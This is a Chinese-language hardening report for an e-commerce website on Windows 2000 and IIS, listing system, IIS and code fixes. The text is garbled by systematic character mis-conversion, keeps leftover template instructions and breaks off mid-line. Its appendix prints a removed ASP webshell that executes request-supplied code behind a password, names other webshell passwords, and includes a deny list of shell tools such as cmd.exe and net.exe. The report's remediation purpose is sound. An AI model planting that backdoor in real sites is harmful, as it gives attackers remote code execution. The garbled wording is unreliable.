XXX電子商務(wù)網(wǎng)站安全加固報告

1、XXX電子商務(wù)網(wǎng)站平安加固報告Windows系統(tǒng)平安加固目錄電子商務(wù)網(wǎng)站平安加固報告 1目錄2、加固主機歹表 3二、加固實施42.1 操作系統(tǒng)加固42.1.1 補丁安裝42.1.2 帳號、口令策略修改 42.1.3 網(wǎng)絡(luò)與效勞加固 42.1.4 文件系統(tǒng)加固 52.1.5 日志審核增強62.1.6 平安性增強72.1.7 推薦安裝平安工具82.2 IIS 效勞加固82.2.1 補丁安裝82.2.2 網(wǎng)站實例權(quán)限分配 82.2.3 IIS 配置平安增強92.2.4 平安控件加固 92.3 代碼審核加固102.3.1 去除 WebShell 代碼102.3.2 去除SQL注入漏洞102.3.3 修

2、正權(quán)限認證缺陷 102.3.4 減少上傳風險威脅 112.3.5 正確處理數(shù)據(jù)庫文件 11三、推薦平安考前須知 123.1 為新增網(wǎng)站實例分配權(quán)限 123.2 使用SSL加密FTP傳輸123.3 增強治理員平安習慣 12四、簽字確認13附錄：14后臺訪問用戶認證分配一覽表 14代碼加固修改一覽表 14第2頁共16頁Windows系統(tǒng)平安加固入加固主機列表本次平安加固效勞的對象包括:編PIP地址操作系統(tǒng)用途或效勞H_2112_1XX.XX.XX.2Windows 2000 Server提供電子商務(wù)效勞,有償提供測試資料填寫規(guī)那么：編號統(tǒng)一使用“型號 地址縮寫數(shù)字型號H主機；D設(shè)備,數(shù)字使用三位數(shù)

3、字順序號.第3頁共16頁Windows系統(tǒng)平安加固二、加固實施2.1操作系統(tǒng)加固2.1.1補丁安裝編號：Windows-02001名稱：補丁安裝系統(tǒng)以往狀態(tài)：Windows 2000 Service Pack 4IE最新積累補丁方案實施使用Windows update女裝最新補丁實施目的可以使系統(tǒng)版本為最新版本實施風險安裝補丁可能導致主機啟動失敗,或其他未知情況發(fā)生2.1.2帳號、口令策略修改編號：Windows-03002,Windows-03003,Windows-03004名稱：帳號口令策略修改系統(tǒng)以往狀態(tài)：密碼長度最小值0字符密碼最長存留期42天密碼最短存留期0天帳號鎖定計數(shù)器無帳戶鎖

4、定時間0帳戶鎖定閥值無方案實施密碼長度最小值7字符密碼最長存留期90天密碼最短存留期30天帳號鎖定計數(shù)器5次帳戶鎖定時間5分鐘帳戶鎖定閥值1分鐘實施目的保證帳號以及口令的平安實施風險設(shè)置帳號策略后可能導致不符合帳號策略的帳號無法登陸,需修改帳號密碼注：治理員不受帳號策略限制,但治理員密碼應(yīng)復雜2.1.3網(wǎng)絡(luò)與效勞加固編號：Windows-04003,Windows-04004名稱：卸載不需要的效勞第4頁共16頁Windows系統(tǒng)平安加固系統(tǒng)以往狀態(tài)：已安裝的不必要的效勞包括：DNS效勞DHCP效勞MS FTP效勞SNMP效勞方案實施開始|設(shè)置|限制面板|添加/刪除程序 Windows組件 卸載

5、不需要的效勞實施目的預(yù)防未知漏洞給主機帶來的風險實施風險可能由于治理員對主機所開放效勞不了解,導致該效勞被卸載.編號：Windows-04005名稱：將暫時不需要開放的效勞停止系統(tǒng)以往狀態(tài)：已啟動且需要停止的效勞包括：Computer Browser 效勞Alerter 效勞Messenger 效勞方案實施開始|運行|services.msc|將上述效勞的啟動類型設(shè)置為手動并停止上 述效勞實施目的預(yù)防未知漏洞給主機帶來的風險實施風險可能由于治理員對主機所開放效勞不了解,導致該效勞被卸載.2.1.4文件系統(tǒng)加固編號：Windows-05002名稱：限制特定執(zhí)行文件的權(quán)限系統(tǒng)以往狀態(tài)：未對敏感執(zhí)行

6、文件設(shè)置適宜的權(quán)限方案實施通過實施我公司的平安策略文件對特定文件權(quán)限進行限制,禁止Guests用戶組訪問這些文件.實施目的禁止Guests用戶組訪問以卜文件：xcopy.exewscript.execscript.exenet.exearp.exeedlin.exeping.exeroute.exeposix.exeRsh.exeatsvc.exeCopy.execacls.exeipconfig.exercp.execmd.exedebug.exeregedt32.exeregedit.exeedit telnet.exeFinger.exeNslookup.exeRexec.exeftp.

7、exeat.exerunonce.exenbtstat.exeTracert.exenetstat.exe實施風險在極少數(shù)情況下,某些網(wǎng)頁可能調(diào)用 cmd.exe來元成某種功能,限制cmd.exe 的執(zhí)行權(quán)限可能導致調(diào)用 cmd失敗.第5頁共16頁Windows系統(tǒng)平安加固2.1,5日志審核增強編號:名稱:Windows-06001設(shè)置主機審核策略系統(tǒng)以往狀態(tài)：審核策略更改無審核審核登錄事件無審核審核對象訪問無審核審核過程追蹤無審核審核目錄效勞訪問無審核審核特權(quán)使用無審核審核系統(tǒng)事件無審核審核帳戶登錄事件無審核審核帳戶治理無審核方案實施通過實施我公司的平安策略文件修改下述值：審核策略更改成功審

8、核登錄事件無審核審核對象訪問成功,失敗審核過程追蹤無審核審核目錄效勞訪問無審核審核特權(quán)使用無審核審核系統(tǒng)事件成功,失敗審核帳戶登錄事件成功,失敗審核帳戶治理成功,失敗實施目的 實施風險對系統(tǒng)事件進行審核,在日后出現(xiàn)故障時用于排查故障. 無編號：Windows-06002 , Windows-06003 , Windows-06004名稱：調(diào)整事件日志的大小、覆蓋策略系統(tǒng)以往狀態(tài)：大小覆蓋方式應(yīng)用日志512K覆蓋早于7天的事件平安日志512K覆蓋早于7天的事件系統(tǒng)日志512K覆蓋早于7天的事件方案實施通過實施我公司的平安策略文件修改下述值：大小覆蓋方式應(yīng)用日志16382K覆蓋早于30天的事件平安

9、日志16384K覆蓋早于30天的事件系統(tǒng)日志16384K覆蓋早于30天的事件實施目的增大日志大小,預(yù)防由于日志文件容量過小導致日志記錄不全實施風險無第6頁共16頁Windows系統(tǒng)平安加固2.1.6平安性增強編號：Windows-07001名稱：禁止匿名用戶連接一系統(tǒng)以往狀態(tài)：Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous的值為 0方案實施通過實施我公司的平安策略文件將該值修改為“1實施目的可以禁止匿名用戶列舉主機上所有用戶、組、共享資源實施風險無編號：Windows-04006名稱：刪除主機治理共享系統(tǒng)以往狀態(tài)：Key:

10、HKLMSYSTEMCurrentControlSetServiceslanmanserverparameters 無"Autoshareserver鍵方案實施通過實施我公司的女全策略文件增加Autoshareserver項,并設(shè)置該值為“1 實施目的刪除主機由于治理而開放的共享實施風險某些應(yīng)用軟件可能需要該共享,如Veritas Netbackup編號：Windows-07001名稱：禁止匿名用戶連接系統(tǒng)以往狀態(tài)：Key:HKLMSYSTEMCurrentControlSetControlLsa“restrictanonymous的值為 0方案實施通過實施我公司的平安策略文件將該值

11、修改為“1實施目的可以禁止匿名用戶列舉主機上所有用戶、組、共享資源實施風險無編號：Windows-03005名稱：限制Guest用戶權(quán)限系統(tǒng)以往狀態(tài)：Guest已禁用,但未對帳號進行權(quán)限限制.方案實施通過實施我公司的平安策略文件禁止Guest帳號本地登錄和網(wǎng)絡(luò)登錄的權(quán)限.實施目的預(yù)防Guest帳號被黑客激活作為后門實施風險無第7頁共16頁Windows系統(tǒng)平安加固2.1.7推薦安裝平安工具工具名稱IceSword 1.06工具用途特洛伊木馬徹查、黑客后門檢測工具相關(guān)信息 :/ 工具名稱X-Scan-v3.2-cn工具用途:網(wǎng)絡(luò)隱患掃描工具相關(guān)信息 :/ 工具名稱請包含版本信息工具用途請簡單描述

12、產(chǎn)品功用相關(guān)信息請寫明產(chǎn)品相關(guān) URL,盡量詳細2.2 IIS 效勞加固2.2.1補丁安裝編號：Windows-02001 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：補丁安裝系統(tǒng)以往狀態(tài)：Windows 2000 Service Pack 4方案實施使用Windows update女裝最新補丁實施目的可以使系統(tǒng)版本為最新版本實施風險應(yīng)描述實施本條舉措所導致的后果2.2.2網(wǎng)站實例權(quán)限分配編號：Windows-02022 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：權(quán)限分配系統(tǒng)以往狀態(tài)：沒有

13、對每個網(wǎng)站實例進行相應(yīng)的權(quán)限分配,任何一個網(wǎng)站被入侵后都后可能導致其他網(wǎng)站被入侵方案實施每個網(wǎng)站實例都對應(yīng)使用低權(quán)限帳戶,并去除網(wǎng)站后臺的匿名訪問,第8頁共16頁Windows系統(tǒng)平安加固集成Windows認證實施目的可以使各個網(wǎng)站實例讀取、修改權(quán)限完全分開,預(yù)防入侵者從一個網(wǎng) 站實例入侵到另一個網(wǎng)站實例實施風險應(yīng)描述實施本條舉措所導致的后果2.2.3 IIS配置平安增強編號：Windows-02022 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：配置平安增強系統(tǒng)以往狀態(tài)：存在很多默認配置,導致入侵者可利用方案實施修正IIS的擴展配置,減少

14、asp.dll解析范圍,禁止下載 MDB文件實施目的減少入侵者入侵幾率,預(yù)防網(wǎng)站數(shù)據(jù)庫被惡意卜載實施風險應(yīng)描述實施本條舉措所導致的后果2.2.4平安控件加固編號：Windows-02022 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：平安空間加固系統(tǒng)以往狀態(tài)：存在很多危險控件,導致入侵者可利用方案實施卸載了 WSH控件,修改 Shell.Application控件的名稱,預(yù)防入侵者 利用：HKEY_CLASSES_ROOTShell.Application改成Shell.Application_OurSafeHKEY_CLASSES_ROOT

15、Shell.Application.1改成了Shell.Application.1_OurSafe實施目的減少ASP木馬對網(wǎng)站的威脅實施風險將有可能導致某些特殊網(wǎng)站實例不能正常運行第9頁共16頁Windows系統(tǒng)平安加固2.3代碼審核加固2.3.1 去除 WebShell 代碼編號：Windows-03001 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：去除WebShell代碼系統(tǒng)以往狀態(tài)：有可能存在入侵者留下的后門、WebShell程序方案實施人工搜索查找入侵者留下的后門ASP程序?qū)嵤┠康念A(yù)防入侵者再次入侵網(wǎng)站實施風險應(yīng)描述實施本條舉措所導

16、致的后果2.3.2 去除SQL注入漏洞編號：Windows-03002 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：去除SQL注入漏洞系統(tǒng)以往狀態(tài)：存在很多SQL注入漏洞方案實施使用統(tǒng)一腳本,對用戶提交進行過濾檢查,預(yù)防用戶提交注入代碼實施目的預(yù)防惡意用戶利用 SQL注入漏洞危害網(wǎng)站實施風險應(yīng)描述實施本條舉措所導致的后果2.3.3 修正權(quán)限認證缺陷編號：Windows-03003 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：修正權(quán)限認證缺陷系統(tǒng)以往狀態(tài)：存在一部份的權(quán)限未認證缺陷方案實施對沒

17、有檢查權(quán)限的貝囿添加權(quán)限認證實施目的預(yù)防低權(quán)限用戶執(zhí)行高權(quán)限功能實施風險應(yīng)描述實施本條舉措所導致的后果第10頁共16頁Windows系統(tǒng)平安加固2.3.4 減少上傳風險威脅編號：Windows-03004 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫文檔的時候?qū)⒈疚淖謩h除名稱：修正權(quán)限認證缺陷系統(tǒng)以往狀態(tài)：存在上傳漏洞方案實施 實施目的修改代碼封堵上傳漏洞預(yù)防惡意用戶上傳 WebShell或其他惡意程序?qū)嵤╋L險應(yīng)描述實施本條舉措所導致的后果2.3.5 正確處理數(shù)據(jù)庫文件編號：Windows-03005 將所有涉及到這個加固項的檢測文檔編號填寫,如 有多個,用逗號分開,寫

18、文檔的時候?qū)⒈疚淖謩h除名稱：正確處理數(shù)據(jù)庫文件系統(tǒng)以往狀態(tài)：米用ASP為擴展名,惡意用戶將有可能插入惡意代碼并執(zhí)行方案實施擴展名改為MDB ,并對WEB應(yīng)用程序進行相應(yīng)修改實施目的預(yù)防惡意用戶插入惡意代碼并執(zhí)行實施風險應(yīng)描述實施本條舉措所導致的后果第11頁共16頁Windows系統(tǒng)平安加固三、推存平安考前須知3.1 為新增網(wǎng)站實例分配權(quán)限當需要新增加一個網(wǎng)站實例的時候,需要根據(jù)一定的步驟完成權(quán)限的分配：1. 新建兩個帳號,刪除這兩個帳號的User組身份,參加 Guest組；2. 指定網(wǎng)站目錄只能夠被 XXXistrator 和SYSTEM全限制,而上述兩個帳號對該目錄及其子目錄有讀寫、修改權(quán)限

19、；3. 在IIS中設(shè)置匿名訪問該網(wǎng)站的匿名帳戶為上述兩個帳號其中之一；4. 在IIS中設(shè)置該網(wǎng)站治理員后臺目錄或核心文件不允許匿名訪問,增加Windows身份認證；5. 在IIS中設(shè)置該網(wǎng)站的主機頭.3.2 使用SSL加密FTP傳輸開啟Serv-U的SSL力口密功能,只允許加密登陸以及加密傳輸文件,以預(yù)防 惡意用戶ARP1探FTP密碼.3.3 增強治理員平安習慣注意及時升級治理員主機的系統(tǒng)補丁和殺毒軟件病毒庫,定期使用推薦的后 門檢測工具對主機進行平安檢測.定期更換Wetg用程序后臺治理員密碼,并保證密碼的強度.第12頁共16頁Windows系統(tǒng)平安加固四、簽字確認雙方認可加固報告,簽字確認.

20、甲方:乙方:簽字簽章日期：簽字簽章 日期第13頁共16頁Windows系統(tǒng)平安加固附錄：后臺訪問用戶認證分配一覽表域名目錄指向后臺登陸用戶名XX D:WEBXXXXXX.XXXX.netD:wwwXXXXX.XXXX D:www1XX.XXXX D:WEBXX XX.XXXX D:WEBXX XX.XXbbs.XX D:WEBXXXbbsXX.XXX.XXXX.XX D:WEBXXXXXXXX.XXX.XXXXX.XX D:WEBXXXexamXX.XXX.XXXX.XX D:WEBXXXXXXXXXXX.XX用戶密碼暫統(tǒng)一為“*不帶雙引號,建議用戶自行修改代碼加固修改一覽表XXX 目錄Con

21、nection.asp修改數(shù)據(jù)庫為mdb結(jié)尾修改包含sql.asp ,預(yù)防SQL注入IncludeRegKey.cfg修改數(shù)據(jù)庫結(jié)尾Setup.asp改名為 Setup04131.aspMangerEditor7183409改為 Editor7183401Includeconst.asp刪除！ webshellIncludeMD5.asp刪掉文件最舟-仃,該仃代碼為webshell代碼XXX 目錄CONN.ASP修改數(shù)據(jù)庫為mdb結(jié)尾修改包含sql.asp ,預(yù)防SQL注入增加容錯信息XXX/CONN.ASP修改數(shù)據(jù)庫為mdb結(jié)尾修改包含sql.asp ,預(yù)防SQL注入增加容錯信息XXX/UP

22、FILE.ASP注釋掉27行,替換成固定上傳路徑為""./pic/" 的代碼增力口對 XXX 身份驗證,<!-#include file="./inc/head.asp"->第14頁共16頁Windows系統(tǒng)平安加固XXX/UPLOAD.ASP增力口對 XXX 身份驗證,<!-#include file="./inc/head.asp"->XXX/TEXTBOX.ASP增力口對 XXX 身份驗證,<!-#include file="./inc/head.asp"->XX

23、X/EOKEDIT.ASP增力口對 XXX 身份驗證,<!-#include file="./inc/head.asp"->eWebEditor目錄名改為 eWebEditor41937editdel.asp修改增加身份驗證chkXXX.asp修改認證方式,米用 session保存號,預(yù)防跨站攻擊test目錄名修改為Test8322XXXXXX.ASP將治理身份認證提前XXXXXX.ASP添加容錯信息修改包含sql.asp ,預(yù)防SQL注入XXXdata.mdb預(yù)防下載,改名為 data3415.mdbXXXincubb.asp刪掉！ WebShell代碼kja

24、skcommon.asp修改數(shù)據(jù)庫為kjgb5674.mdb修改包含sql.asp ,預(yù)防SQL注入增加容錯信息XXX 目錄XXXXX_backup.asp刪掉！ WebShell ,密碼是 6568168XXdragon.asp刪掉！ WebShellXXLOGIN.ASP刪除最后三行,WebShell代碼<!了><objectid=fsRUNAT=SERVEclassid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object><! 了 ><%ifrequest(&qu

25、ot;kker")<>"4136705"thenSession("b")=request("kker")if Session("b")<>"" then execute Session("b")%>XXXXXTEST.ASP空文件XXXXXtestab.asp刪除,WebShell ,密碼是!#123XXXXX_backup.asp刪除！ WebShellXXtiet.asp刪除！ WebShellXXuserad.asp刪除！ WebShellXXXXXtestab.asp刪除！ WebShellXX20.asp刪除！ WebShellCONN.ASP修改數(shù)據(jù)庫為mdb結(jié)尾修改包含sql.asp ,預(yù)防SQL注入增加容錯信息AD/qidong未知快捷方式XX/UPFILE.ASP注釋掉27行,替換成固定上傳路徑為""./pic/" 的代碼增力口 對 XXX 身份驗證, <